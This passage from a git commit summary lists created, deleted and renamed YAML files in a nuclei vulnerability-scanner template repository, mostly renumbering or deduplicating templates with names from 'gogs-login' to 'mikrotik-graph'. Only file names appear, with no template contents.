nuclei-templates/Other/gocd-cruise-configuration-7746.yaml delete mode 100644 nuclei-templates/Other/gocd-cruise-configuration-7748.yaml delete mode 100644 nuclei-templates/Other/gogs-login-7759.yaml create mode 100644 nuclei-templates/Other/gogs-login.yaml create mode 100644 nuclei-templates/Other/goip-1-lfi-7762.yaml delete mode 100644 nuclei-templates/Other/goip-1-lfi-7764.yaml rename nuclei-templates/Other/{google-api-7772.yaml => google-api(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/google-api-key-7768.yaml create mode 100644 nuclei-templates/Other/google-api-key.yaml rename nuclei-templates/Other/{google-floc-disabled-7787.yaml => google-floc-disabled.yaml} (100%) create mode 100644 nuclei-templates/Other/google-secrets.yaml create mode 100644 nuclei-templates/Other/google-storage-7789.yaml delete mode 100644 nuclei-templates/Other/google-storage.yaml delete mode 100644 nuclei-templates/Other/google-textsearchplaces.yaml create mode 100644 nuclei-templates/Other/googlet-extsearchplaces.yaml rename nuclei-templates/Other/{gophish-default-login-7793.yaml => gophish-default-login-7792.yaml} (100%) rename nuclei-templates/{CVE-2024/CVE-2024-1728.yaml => Other/gradio-CVE-2024-1728.yaml} (100%) rename nuclei-templates/Other/{gradle-enterprise-panel-7800.yaml => gradle-enterprise-panel-7799.yaml} (100%) delete mode 100644 nuclei-templates/Other/grafana-file-read-7811.yaml create mode 100644 nuclei-templates/Other/grafana-file-read.yaml create mode 100644 nuclei-templates/Other/grails-database-admin-console-7819.yaml delete mode 100644 nuclei-templates/Other/grails-database-admin-console-7820.yaml create mode 100644 nuclei-templates/Other/graphql-detect-7832.yaml delete mode 100644 nuclei-templates/Other/graphql-detect.yaml create mode 100644 nuclei-templates/Other/graphql-field-suggestion-7834.yaml delete mode 100644 nuclei-templates/Other/graphql-field-suggestion.yaml delete mode 100644 nuclei-templates/Other/graphql-get-method-7836.yaml create mode 100644 nuclei-templates/Other/graphql-get-method.yaml rename nuclei-templates/Other/{graylog-api-browser.yaml => graylog-api-browser-7846.yaml} (100%) create mode 100644 nuclei-templates/Other/groovy-console-open.yaml rename nuclei-templates/Other/{groupoffice-lfi-7851.yaml => groupoffice-lfi.yaml} (100%) create mode 100644 nuclei-templates/Other/gruntfile-exposure-7852.yaml delete mode 100644 nuclei-templates/Other/gruntfile-exposure.yaml create mode 100644 nuclei-templates/Other/gsoap-lfl(1).yaml rename nuclei-templates/Other/{GT-AC2900-login.yaml => gt-ac2900-login(1).yaml} (100%) rename nuclei-templates/Other/{gunicorn-detect-7862.yaml => gunicorn-detect-7864.yaml} (100%) delete mode 100644 nuclei-templates/Other/h2console-panel-7866.yaml create mode 100644 nuclei-templates/Other/h2console-panel.yaml create mode 100644 "nuclei-templates/Other/h3c secpath \350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237.yaml" delete mode 100644 nuclei-templates/Other/h3c-imc-rce-7870.yaml create mode 100644 nuclei-templates/Other/h3c-imc-rce-7871.yaml rename nuclei-templates/Other/{hadoop-exposure-7874.yaml => hadoop-exposure.yaml} (100%) delete mode 100644 nuclei-templates/Other/hadoop-unauth-7875.yaml create mode 100644 nuclei-templates/Other/hadoop-unauth-7878.yaml rename nuclei-templates/Other/{hanming-lfr.yaml => hanming-lfr-7880.yaml} (100%) rename nuclei-templates/Other/{hanwang-detect-7881.yaml => hanwang-detect-7882.yaml} (100%) rename nuclei-templates/Other/{harbor-detect-7886.yaml => harbor-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7890.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7891.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-webgui-7897.yaml delete mode 100644 nuclei-templates/Other/hashicorp-consul-webgui.yaml create mode 100644 nuclei-templates/Other/hasura-graphql-psql-exec-7901.yaml delete mode 100644 nuclei-templates/Other/hasura-graphql-psql-exec.yaml create mode 100644 nuclei-templates/Other/hb-audio-lfi-7911.yaml delete mode 100644 nuclei-templates/Other/hb-audio-lfi-7912.yaml rename nuclei-templates/Other/{ssrf-injection.yaml => header-injection(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/header_blind_xss-7914.yaml create mode 100644 nuclei-templates/Other/header_blind_xss-7915.yaml create mode 100644 nuclei-templates/Other/helpjuice-takeover-7925.yaml delete mode 100644 nuclei-templates/Other/helpjuice-takeover.yaml delete mode 100644 nuclei-templates/Other/helpscout-takeover-7935.yaml create mode 100644 nuclei-templates/Other/helpscout-takeover.yaml rename nuclei-templates/Other/{heroku-takeover-7941.yaml => heroku-takeover-7944.yaml} (100%) create mode 100644 nuclei-templates/Other/hikvision-detection-7954.yaml delete mode 100644 nuclei-templates/Other/hikvision-detection.yaml rename nuclei-templates/Other/{hitron-technologies-7959.yaml => hitron-technologies-7961.yaml} (100%) delete mode 100644 nuclei-templates/Other/hjtcloud-arbitrary-file-read-7967.yaml create mode 100644 nuclei-templates/Other/hjtcloud-arbitrary-file-read-7968.yaml delete mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read-7973.yaml create mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read-7976.yaml rename nuclei-templates/Other/{hmc-hybris-panel-7978.yaml => hmc-hybris-panel.yaml} (100%) rename nuclei-templates/Other/{homeautomation-v3-openredirect.yaml => homeautomation-v3-openredirect-7986.yaml} (100%) delete mode 100644 nuclei-templates/Other/honeywell-scada-config-7992.yaml create mode 100644 nuclei-templates/Other/honeywell-scada-config.yaml rename nuclei-templates/Other/{honeywell-web-controller-7996.yaml => honeywell-web-controller-7993.yaml} (100%) delete mode 100644 nuclei-templates/Other/hongdian-default-login-7997.yaml create mode 100644 nuclei-templates/Other/hongdian-default-login.yaml delete mode 100644 nuclei-templates/Other/host_poisening.yaml create mode 100644 nuclei-templates/Other/hostheaderpoisoning.yaml delete mode 100644 nuclei-templates/Other/hp-blade-admin-detect-8005.yaml create mode 100644 nuclei-templates/Other/hp-blade-admin-detect.yaml rename nuclei-templates/Other/{hp-device-info-detect-8008.yaml => hp-device-info-detect-8010.yaml} (100%) delete mode 100644 nuclei-templates/Other/hp-ilo-5-8021.yaml create mode 100644 nuclei-templates/Other/hp-ilo-5.yaml create mode 100644 nuclei-templates/Other/hp-laserjet-detect-8027.yaml delete mode 100644 nuclei-templates/Other/hp-laserjet-detect-8028.yaml rename nuclei-templates/Other/{hp-media-vault-detect.yaml => hp-media-vault-detect-8031.yaml} (100%) rename nuclei-templates/Other/{hp-service-manager-8034.yaml => hp-service-manager-8033.yaml} (100%) delete mode 100644 nuclei-templates/Other/hp-switch-default-login-8035.yaml create mode 100644 nuclei-templates/Other/hp-switch-default-login-8038.yaml create mode 100644 nuclei-templates/Other/hpe-system-management-login-8014.yaml delete mode 100644 nuclei-templates/Other/hpe-system-management-login-8017.yaml rename nuclei-templates/Other/{hrsale-unauthenticated-lfi-8040.yaml => hrsale-unauthenticated-lfi.yaml} (100%) rename nuclei-templates/Other/{hsort-fileRead.yaml => hsort-fileread.yaml} (100%) rename nuclei-templates/Other/{hst-fileRead.yaml => hst-fileread.yaml} (100%) delete mode 100644 nuclei-templates/Other/htaccess-config-8042.yaml create mode 100644 nuclei-templates/Other/htaccess-config.yaml create mode 100644 nuclei-templates/Other/htpasswd-detection-8046.yaml delete mode 100644 nuclei-templates/Other/htpasswd-detection.yaml create mode 100644 nuclei-templates/Other/http-etcd-unauthenticated-api-data-leak-8056.yaml delete mode 100644 nuclei-templates/Other/http-etcd-unauthenticated-api-data-leak.yaml rename nuclei-templates/Other/{http-raw.yaml => http-raw-multiple.yaml} (100%) create mode 100644 nuclei-templates/Other/httpbin-open-redirect-8047.yaml delete mode 100644 nuclei-templates/Other/httpbin-open-redirect.yaml rename nuclei-templates/Other/{dahua-publishing-fileupload.yaml => huatian-oa-upload-file-upload.yaml} (100%) create mode 100644 nuclei-templates/Other/huawei-HG532e-default-login.yaml delete mode 100644 nuclei-templates/Other/huawei-hg255s-lfi-8060.yaml create mode 100644 nuclei-templates/Other/huawei-hg255s-lfi-8061.yaml delete mode 100644 nuclei-templates/Other/huawei-hg532e-default-router-login-8062.yaml rename nuclei-templates/Other/{huawei-hg659-lfi.yaml => huawei-hg659-lfi-8067.yaml} (100%) delete mode 100644 nuclei-templates/Other/huawei-home-gateway-8072.yaml create mode 100644 nuclei-templates/Other/huawei-home-gateway.yaml rename nuclei-templates/Other/{huayu-Reporter-fileRead.yaml => huayu-reporter-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/hubspot-takeover-8079.yaml delete mode 100644 nuclei-templates/Other/hubspot-takeover.yaml delete mode 100644 nuclei-templates/Other/hubspot.yaml delete mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8082.yaml create mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8087.yaml rename nuclei-templates/Other/{ibm-advanced-system-management-8091.yaml => ibm-advanced-system-management-8088.yaml} (100%) delete mode 100644 nuclei-templates/Other/ibm-friendly-path-exposure-8092.yaml create mode 100644 nuclei-templates/Other/ibm-friendly-path-exposure.yaml create mode 100644 nuclei-templates/Other/ibm-infoprint-lfi-8101.yaml delete mode 100644 nuclei-templates/Other/ibm-infoprint-lfi.yaml create mode 100644 nuclei-templates/Other/ibm-mqseries-default-login-8106.yaml delete mode 100644 nuclei-templates/Other/ibm-mqseries-default-login.yaml rename nuclei-templates/Other/{ibm-note-login-8111.yaml => ibm-note-login-8110.yaml} (100%) rename nuclei-templates/Other/{ibm-security-access-manager-8115.yaml => ibm-security-access-manager.yaml} (100%) rename nuclei-templates/Other/{ibm-sterling-detect.yaml => ibm-sterling-detect-8122.yaml} (100%) delete mode 100644 nuclei-templates/Other/ibm-storage-default-credential-8124.yaml create mode 100644 nuclei-templates/Other/ibm-storage-default-credential.yaml create mode 100644 nuclei-templates/Other/ibm-websphere-ssrf-8126.yaml delete mode 100644 nuclei-templates/Other/ibm-websphere-ssrf.yaml create mode 100644 nuclei-templates/Other/icewarp-webclient-rce-8133.yaml delete mode 100644 nuclei-templates/Other/icewarp-webclient-rce.yaml create mode 100644 nuclei-templates/Other/id-q-xss.yaml delete mode 100644 nuclei-templates/Other/id-xss.yaml rename nuclei-templates/Other/{idemia-biometrics-default-login-8138.yaml => idemia-biometrics-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/identity-services-engine-8147.yaml delete mode 100644 nuclei-templates/Other/identity-services-engine.yaml create mode 100644 nuclei-templates/Other/idor-vuln-params(1).yaml delete mode 100644 nuclei-templates/Other/idor-vuln-params.yaml rename nuclei-templates/Other/{iis-internal-ip-disclosure.yaml => iis-internal-ip-disclosure-8149.yaml} (100%) rename nuclei-templates/Other/{ilo-detect-8154.yaml => ilo-detect-8156.yaml} (100%) rename nuclei-templates/Other/{influxdb-detect.yaml => influxdb-detect-8160.yaml} (100%) create mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login-8162.yaml delete mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login.yaml create mode 100644 "nuclei-templates/Other/inspur-\346\224\277\345\212\241\347\263\273\347\273\237.yaml" delete mode 100644 nuclei-templates/Other/intercom-takeover-8166.yaml create mode 100644 nuclei-templates/Other/intercom-takeover.yaml delete mode 100644 nuclei-templates/Other/interlib-fileread-8170.yaml create mode 100644 nuclei-templates/Other/interlib-fileread-8171.yaml create mode 100644 nuclei-templates/Other/iomega-emc-shared-nas-8181.yaml delete mode 100644 nuclei-templates/Other/iomega-emc-shared-nas.yaml rename nuclei-templates/Other/{iotawatt-app-exposure.yaml => iotawatt-app-exposure-8187.yaml} (100%) delete mode 100644 nuclei-templates/Other/iplanet-imap-detect-8188.yaml create mode 100644 nuclei-templates/Other/iplanet-imap-detect.yaml rename nuclei-templates/Other/{iptime-default-login-8192.yaml => iptime-default-login-8193.yaml} (100%) delete mode 100644 nuclei-templates/Other/issuu-panel-lfi-8199.yaml create mode 100644 nuclei-templates/Other/issuu-panel-lfi.yaml delete mode 100644 nuclei-templates/Other/iterable.yaml delete mode 100644 nuclei-templates/Other/itop-detect-8201.yaml create mode 100644 nuclei-templates/Other/itop-detect-8203.yaml rename nuclei-templates/Other/{itop-panel.yaml => itop-panel-8205.yaml} (100%) create mode 100644 nuclei-templates/Other/ixcache-panel-8206.yaml delete mode 100644 nuclei-templates/Other/ixcache-panel.yaml create mode 100644 nuclei-templates/Other/jaeger-ui-dashboard-8207.yaml delete mode 100644 nuclei-templates/Other/jaeger-ui-dashboard.yaml delete mode 100644 nuclei-templates/Other/jamf-log4j-jndi-rce-8212.yaml create mode 100644 nuclei-templates/Other/jamf-log4j-jndi-rce.yaml rename nuclei-templates/Other/{jamf-panel.yaml => jamf-panel-8216.yaml} (100%) create mode 100644 nuclei-templates/Other/jaspersoft-detect-8218.yaml delete mode 100644 nuclei-templates/Other/jaspersoft-detect-8219.yaml create mode 100644 nuclei-templates/Other/java-rmi-detect-8228.yaml delete mode 100644 nuclei-templates/Other/java-rmi-detect.yaml create mode 100644 nuclei-templates/Other/jazzhr-takeover-8233.yaml delete mode 100644 nuclei-templates/Other/jazzhr-takeover-8234.yaml create mode 100644 nuclei-templates/Other/jboss-detect-8237.yaml delete mode 100644 nuclei-templates/Other/jboss-detect.yaml create mode 100755 nuclei-templates/Other/jboss-status-8241.yaml delete mode 100644 nuclei-templates/Other/jboss-status-8243.yaml delete mode 100644 nuclei-templates/Other/jdbc-connection-string-8244.yaml create mode 100644 nuclei-templates/Other/jdbc-connection-string.yaml create mode 100644 nuclei-templates/Other/jeecg-boot-detect-8248.yaml delete mode 100644 nuclei-templates/Other/jeecg-boot-detect.yaml delete mode 100644 nuclei-templates/Other/jeewms-lfi-8253.yaml create mode 100644 nuclei-templates/Other/jeewms-lfi.yaml rename nuclei-templates/Other/{jenkins-api-panel-8261.yaml => jenkins-api-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8266.yaml delete mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8269.yaml delete mode 100644 nuclei-templates/Other/jenkins-default-8272.yaml create mode 100644 nuclei-templates/Other/jenkins-default-8273.yaml rename nuclei-templates/Other/{jenkins-detect-8275.yaml => jenkins-detect-8276.yaml} (100%) rename nuclei-templates/Other/{jenkins-login-8280.yaml => jenkins-login-8277.yaml} (100%) delete mode 100644 nuclei-templates/Other/jenkins-script-8281.yaml create mode 100644 nuclei-templates/Other/jenkins-script-8283.yaml create mode 100644 nuclei-templates/Other/jetty-showcontexts-enable-8295.yaml delete mode 100644 nuclei-templates/Other/jetty-showcontexts-enable.yaml create mode 100644 nuclei-templates/Other/jfrog-8306.yaml delete mode 100644 nuclei-templates/Other/jfrog-login.yaml delete mode 100644 nuclei-templates/Other/jfrog-unauth-build-exposed-8299.yaml create mode 100644 nuclei-templates/Other/jfrog-unauth-build-exposed.yaml rename nuclei-templates/Other/{jinfornet-jreport-lfi-8307.yaml => jinfornet-jreport-lfi-8310.yaml} (100%) delete mode 100644 nuclei-templates/Other/jira-detect-8314.yaml create mode 100644 nuclei-templates/Other/jira-detect-8316.yaml create mode 100644 nuclei-templates/Other/jira-login-check.yaml delete mode 100644 nuclei-templates/Other/jira-login-default.yaml delete mode 100644 nuclei-templates/Other/jira-service-desk-signup-8317.yaml create mode 100644 nuclei-templates/Other/jira-service-desk-signup-8321.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards-8326.yaml delete mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards.yaml rename nuclei-templates/Other/{jira-unauthenticated-projectcategories.yaml => jira-unauthenticated-projectcategories-8332.yaml} (100%) create mode 100644 nuclei-templates/Other/jira-unauthenticated-user-picker-8341.yaml delete mode 100644 nuclei-templates/Other/jira-unauthenticated-user-picker.yaml rename nuclei-templates/Other/{jmx-console-8352.yaml => jmx-console-8353.yaml} (100%) rename nuclei-templates/Other/{jmx-default-login.yaml => jmx-default-login-8356.yaml} (100%) create mode 100644 nuclei-templates/Other/jolokia-8368.yaml delete mode 100644 nuclei-templates/Other/jolokia-8369.yaml create mode 100644 nuclei-templates/Other/jolokia-info-disclosure-8358.yaml delete mode 100644 nuclei-templates/Other/jolokia-info-disclosure.yaml create mode 100644 nuclei-templates/Other/jolokia-list-8360.yaml delete mode 100644 nuclei-templates/Other/jolokia-list.yaml rename nuclei-templates/Other/{joomla-com-fabrik-lfi-8373.yaml => joomla-com-fabrik-lfi-8371.yaml} (100%) rename nuclei-templates/Other/{joomla-config-file.yaml => joomla-config-file-8376.yaml} (100%) delete mode 100644 nuclei-templates/Other/joomla-htaccess-8381.yaml create mode 100644 nuclei-templates/Other/joomla-htaccess-8383.yaml create mode 100644 nuclei-templates/Other/joomla-manifest-file-8387.yaml delete mode 100644 nuclei-templates/Other/joomla-manifest-file.yaml delete mode 100644 nuclei-templates/Other/joomla-panel-8389.yaml create mode 100644 nuclei-templates/Other/joomla-panel-8391.yaml delete mode 100644 nuclei-templates/Other/joomla.yaml create mode 100644 nuclei-templates/Other/jsf-detection-8398.yaml delete mode 100644 nuclei-templates/Other/jsf-detection.yaml create mode 100644 nuclei-templates/Other/jupyter-ipython-unauth-8405.yaml delete mode 100644 nuclei-templates/Other/jupyter-ipython-unauth.yaml create mode 100644 nuclei-templates/Other/jupyter-notebook-8407.yaml delete mode 100644 nuclei-templates/Other/jupyter-notebook.yaml create mode 100644 nuclei-templates/Other/jwt-token-8408.yaml delete mode 100644 nuclei-templates/Other/jwt-token-8410.yaml create mode 100644 nuclei-templates/Other/kafka-center-default-login-8415.yaml delete mode 100644 nuclei-templates/Other/kafka-center-default-login.yaml rename nuclei-templates/Other/{kafka-connect-ui.yaml => kafka-connect-ui-8420.yaml} (100%) rename nuclei-templates/Other/{kafka-consumer-monitor-8425.yaml => kafka-consumer-monitor.yaml} (100%) create mode 100644 nuclei-templates/Other/kafka-cruise-control-8427.yaml delete mode 100644 nuclei-templates/Other/kafka-cruise-control.yaml rename nuclei-templates/Other/{kafka-topics-ui-8432.yaml => kafka-topics-ui-8434.yaml} (100%) rename nuclei-templates/Other/{keenetic-web-login-8442.yaml => keenetic-web-login-8443.yaml} (100%) create mode 100644 nuclei-templates/Other/kenesto-login-8445.yaml delete mode 100644 nuclei-templates/Other/kenesto-login.yaml rename nuclei-templates/Other/{kentico-login-8446.yaml => kentico-login-8447.yaml} (100%) create mode 100644 nuclei-templates/Other/keo-klr300n-install.yaml rename nuclei-templates/Other/{kerio-connect-client-8450.yaml => kerio-connect-client-8452.yaml} (100%) delete mode 100644 nuclei-templates/Other/kevinlab-bems-backdoor-8453.yaml create mode 100644 nuclei-templates/Other/kevinlab-bems-backdoor-8456.yaml rename nuclei-templates/Other/{kevinlab-bems-sqli.yaml => kevinlab-bems-sqli-8459.yaml} (100%) delete mode 100644 nuclei-templates/Other/kevinlab-hems-backdoor-8466.yaml create mode 100644 nuclei-templates/Other/kevinlab-hems-backdoor.yaml create mode 100644 nuclei-templates/Other/key-cloak-admin-panel-8468.yaml delete mode 100644 nuclei-templates/Other/key-cloak-admin-panel-8470.yaml delete mode 100644 nuclei-templates/Other/keycloak-json-8472.yaml create mode 100644 nuclei-templates/Other/keycloak-json.yaml create mode 100644 nuclei-templates/Other/keycloak-openid-config-8475.yaml delete mode 100644 nuclei-templates/Other/keycloak-openid-config.yaml create mode 100644 nuclei-templates/Other/keycloak-xss-8478.yaml delete mode 100644 nuclei-templates/Other/keycloak-xss-8481.yaml rename nuclei-templates/Other/{kibana-detect-8484.yaml => kibana-detect.yaml} (100%) rename nuclei-templates/Other/{kibana-panel.yaml => kibana-panel-8485.yaml} (100%) create mode 100644 nuclei-templates/Other/kingdee-eas.yaml create mode 100644 "nuclei-templates/Other/kingdee\344\272\247\345\223\201.yaml" rename nuclei-templates/Other/{Kingsoft-default-login.yaml => kingsoft-default-login.yaml} (100%) rename nuclei-templates/Other/{Kingsoft-upload.yaml => kingsoft-upload.yaml} (100%) create mode 100644 nuclei-templates/Other/kingsoft-v8-file-read-8491.yaml delete mode 100644 nuclei-templates/Other/kingsoft-v8-file-read.yaml create mode 100644 nuclei-templates/Other/kinsta-takeover-8493.yaml delete mode 100644 nuclei-templates/Other/kinsta-takeover-8494.yaml delete mode 100644 nuclei-templates/Other/klr300n-installer.yaml rename nuclei-templates/Other/{Konga-default-login.yaml => konga-default-login.yaml} (100%) rename nuclei-templates/Other/{kube-api-deployments-8503.yaml => kube-api-deployments.yaml} (100%) delete mode 100644 nuclei-templates/Other/kube-api-pods-8509.yaml create mode 100644 nuclei-templates/Other/kube-api-pods.yaml create mode 100644 nuclei-templates/Other/kube-api-secrets-8511.yaml delete mode 100644 nuclei-templates/Other/kube-api-secrets.yaml delete mode 100644 nuclei-templates/Other/kube-api-services-8513.yaml create mode 100644 nuclei-templates/Other/kube-api-services-8514.yaml create mode 100644 nuclei-templates/Other/kubeflow-dashboard-unauth-8515.yaml delete mode 100644 nuclei-templates/Other/kubeflow-dashboard-unauth.yaml rename nuclei-templates/Other/{kubelet-pods-8522.yaml => kubelet-pods.yaml} (100%) delete mode 100644 nuclei-templates/Other/kubelet-runningpods-8525.yaml create mode 100644 nuclei-templates/Other/kubelet-scan.yaml rename nuclei-templates/Other/{kubernetes-kustomization-disclosure-8532.yaml => kubernetes-kustomization-disclosure.yaml} (100%) create mode 100644 nuclei-templates/Other/kubernetes-mirantis-8541.yaml delete mode 100644 nuclei-templates/Other/kubernetes-mirantis.yaml rename nuclei-templates/Other/{kubernetes-pods-api.yaml => kubernetes-pods-8546.yaml} (100%) rename nuclei-templates/Other/{Kubernetes-unauth.yaml => kubernetes-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/kubio.yaml create mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi-8557.yaml delete mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi-8559.yaml create mode 100644 nuclei-templates/Other/landingi-takeover-8566.yaml delete mode 100644 nuclei-templates/Other/landingi-takeover-8567.yaml create mode 100644 nuclei-templates/Other/landray-oa-fileread-8569.yaml delete mode 100644 nuclei-templates/Other/landray-oa-fileread.yaml delete mode 100644 nuclei-templates/Other/landray-oa-treexml-rce.yaml create mode 100644 nuclei-templates/Other/lansweeper-login-8572.yaml delete mode 100644 nuclei-templates/Other/lansweeper-login.yaml create mode 100644 nuclei-templates/Other/laravel-debug-enabled-8576.yaml delete mode 100644 nuclei-templates/Other/laravel-debug-enabled-8577.yaml rename nuclei-templates/Other/{laravel-env-8586.yaml => laravel-env-8580.yaml} (100%) create mode 100644 nuclei-templates/Other/laravel-log-file-8597.yaml delete mode 100644 nuclei-templates/Other/laravel-log-file-8598.yaml create mode 100644 nuclei-templates/Other/lazy-file-8608.yaml delete mode 100644 nuclei-templates/Other/lazy-file.yaml create mode 100644 nuclei-templates/Other/lfi-linux-fuzz.yaml rename nuclei-templates/Other/{express-lfr (copy 1).yaml => lfr_express.yaml} (100%) rename nuclei-templates/Other/{liferay-portal-detect-8624.yaml => liferay-portal-detect-8626.yaml} (100%) delete mode 100644 nuclei-templates/Other/linkedin-id-11853.yaml create mode 100644 nuclei-templates/Other/linkedin-id.yaml create mode 100644 nuclei-templates/Other/linkerd-badrule-detect-8630.yaml delete mode 100644 nuclei-templates/Other/linkerd-detect.yaml delete mode 100644 nuclei-templates/Other/linkerd-service-detect-8634.yaml create mode 100644 nuclei-templates/Other/linkerd-service-detect.yaml create mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8637.yaml delete mode 100644 nuclei-templates/Other/linkerd-ssrf-detect.yaml delete mode 100644 nuclei-templates/Other/linux-lfi-fuzz.yaml delete mode 100644 nuclei-templates/Other/linux-lfi-fuzzing.yaml rename nuclei-templates/Other/{liveview-axis-camera.yaml => liveview-axis-camera-8648.yaml} (100%) create mode 100644 nuclei-templates/Other/log4j-fuzz-head-poc.yaml delete mode 100644 nuclei-templates/Other/log4j-header.yaml delete mode 100644 nuclei-templates/Other/log4j-rce.yaml delete mode 100644 nuclei-templates/Other/log4jshell-detect.yaml create mode 100644 nuclei-templates/Other/log4jshell.yaml create mode 100644 nuclei-templates/Other/lotus-domino-version-8655.yaml delete mode 100644 nuclei-templates/Other/lotus-domino-version-8656.yaml create mode 100644 nuclei-templates/Other/lucee-login-8663.yaml delete mode 100644 nuclei-templates/Other/lucee-login-8665.yaml create mode 100644 nuclei-templates/Other/lucee-stack-trace-8668.yaml delete mode 100644 nuclei-templates/Other/lucee-stack-trace.yaml delete mode 100644 nuclei-templates/Other/luftguitar-arbitrary-file-upload-8672.yaml create mode 100644 nuclei-templates/Other/luftguitar-arbitrary-file-upload.yaml rename nuclei-templates/Other/{maccmsv10-backdoor-8686.yaml => maccmsv10-backdoor-8683.yaml} (100%) delete mode 100644 nuclei-templates/Other/magento-2-exposed-api-8688.yaml create mode 100644 nuclei-templates/Other/magento-2-exposed-api-8689.yaml delete mode 100644 nuclei-templates/Other/magento-admin-panel-8692.yaml create mode 100644 nuclei-templates/Other/magento-admin-panel-8695.yaml delete mode 100644 nuclei-templates/Other/magento-cacheleak-8696.yaml create mode 100644 nuclei-templates/Other/magento-cacheleak-8698.yaml rename nuclei-templates/Other/{magento-config-8702.yaml => magento-config.yaml} (100%) create mode 100644 nuclei-templates/Other/magento-detect-8705.yaml delete mode 100644 nuclei-templates/Other/magento-detect.yaml rename nuclei-templates/Other/{magento-config-disclosure.yaml => magento-information-disclosure.yaml} (100%) create mode 100644 nuclei-templates/Other/magento-unprotected-dev-files-8709.yaml delete mode 100644 nuclei-templates/Other/magento-unprotected-dev-files.yaml rename nuclei-templates/Other/{MagicFlow-sqli.yaml => magicflow-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/maian-cart-detect-8719.yaml delete mode 100644 nuclei-templates/Other/maian-cart-detect.yaml delete mode 100644 nuclei-templates/Other/mailchimp-api-11854.yaml create mode 100644 nuclei-templates/Other/mailchimp-api.yaml delete mode 100644 nuclei-templates/Other/manage-engine-admanager-panel-8731.yaml create mode 100644 nuclei-templates/Other/manage-engine-admanager-panel.yaml delete mode 100644 nuclei-templates/Other/manageengine-adaudit-8728.yaml create mode 100644 nuclei-templates/Other/manageengine-adaudit.yaml rename nuclei-templates/Other/{manageengine-adselfservice.yaml => manageengine-adselfservice-8736.yaml} (100%) rename nuclei-templates/Other/{manageengine-analytics-8742.yaml => manageengine-analytics.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk-8747.yaml delete mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk.yaml rename nuclei-templates/Other/{manageengine-applications-manager-8753.yaml => manageengine-applications-manager-8752.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8756.yaml delete mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8757.yaml delete mode 100644 nuclei-templates/Other/manageengine-keymanagerplus-8764.yaml create mode 100644 nuclei-templates/Other/manageengine-keymanagerplus.yaml create mode 100644 nuclei-templates/Other/manageengine-opmanager-8767.yaml delete mode 100644 nuclei-templates/Other/manageengine-opmanager-8768.yaml create mode 100644 nuclei-templates/Other/manageengine-servicedesk-8771.yaml delete mode 100644 nuclei-templates/Other/manageengine-servicedesk-8772.yaml delete mode 100644 nuclei-templates/Other/mantis-detect-8780.yaml create mode 100644 nuclei-templates/Other/mantis-detect-8782.yaml delete mode 100644 nuclei-templates/Other/mapbox.yaml rename nuclei-templates/Other/{mashery-takeover-8786.yaml => mashery-takeover-8785.yaml} (100%) rename nuclei-templates/Other/{get.yaml => match-1.yaml} (100%) create mode 100644 nuclei-templates/Other/mcafee-epo-rce-8793.yaml delete mode 100644 nuclei-templates/Other/mcafee-epo-rce.yaml rename nuclei-templates/Other/{mdb-database-file-8796.yaml => mdb-database-file-8795.yaml} (100%) rename nuclei-templates/Other/{medium-takeover-8798.yaml => medium-takeover.yaml} (100%) rename nuclei-templates/Other/{memcached-stats.yaml => memcached-stats-8800.yaml} (100%) create mode 100644 nuclei-templates/Other/meshcentral-login-8801.yaml delete mode 100644 nuclei-templates/Other/meshcentral-login-8803.yaml create mode 100644 nuclei-templates/Other/metadata-alibaba-8807.yaml delete mode 100644 nuclei-templates/Other/metadata-alibaba-8809.yaml create mode 100644 nuclei-templates/Other/metadata-aws-8810.yaml delete mode 100644 nuclei-templates/Other/metadata-aws.yaml create mode 100644 nuclei-templates/Other/metadata-azure-8813.yaml delete mode 100644 nuclei-templates/Other/metadata-azure-8815.yaml create mode 100644 nuclei-templates/Other/metadata-digitalocean-8818.yaml delete mode 100644 nuclei-templates/Other/metadata-digitalocean.yaml delete mode 100644 nuclei-templates/Other/metadata-google-8820.yaml create mode 100644 nuclei-templates/Other/metadata-google.yaml create mode 100644 nuclei-templates/Other/metadata-hetzner-8822.yaml delete mode 100644 nuclei-templates/Other/metadata-hetzner-8823.yaml delete mode 100644 nuclei-templates/Other/metadata-openstack-8827.yaml create mode 100644 nuclei-templates/Other/metadata-openstack.yaml delete mode 100644 nuclei-templates/Other/metadata-oracle-8830.yaml create mode 100644 nuclei-templates/Other/metadata-oracle-8831.yaml delete mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8851.yaml create mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8853.yaml rename nuclei-templates/Other/{microsoft-teams-webhook-8858.yaml => microsoft-teams-webhook.yaml} (100%) delete mode 100644 nuclei-templates/Other/microweber-detect-8863.yaml create mode 100644 nuclei-templates/Other/microweber-detect.yaml delete mode 100644 nuclei-templates/Other/microweber-xss-8864.yaml create mode 100644 nuclei-templates/Other/microweber-xss-8865.yaml create mode 100644 nuclei-templates/Other/mida-eframework-xss-8869.yaml delete mode 100644 nuclei-templates/Other/mida-eframework-xss.yaml rename nuclei-templates/Other/{mikrotik-graph-8870.yaml => mikrotik-graph-8871.yaml} (100%) 